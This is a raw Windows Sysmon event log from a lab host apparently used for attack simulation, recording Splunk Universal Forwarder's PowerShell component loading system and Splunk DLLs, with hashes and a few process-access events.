Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100757Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100756Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100755Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100754Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100753Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100752Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100751Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100750Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100749Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100748Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100747Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100746Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100745Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100744Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100743Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100742Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100741Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100740Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100739Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100738Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000100737Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100736Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100735Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100734Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100733Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100732Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100731Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100730Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100729Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100728Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100727Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100726Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100725Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100724Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x8000000000000000100723Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100722Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100721Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100720Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9trueSplunk, Inc.Valid 10341000x8000000000000000100718Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100717Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100716Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100715Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 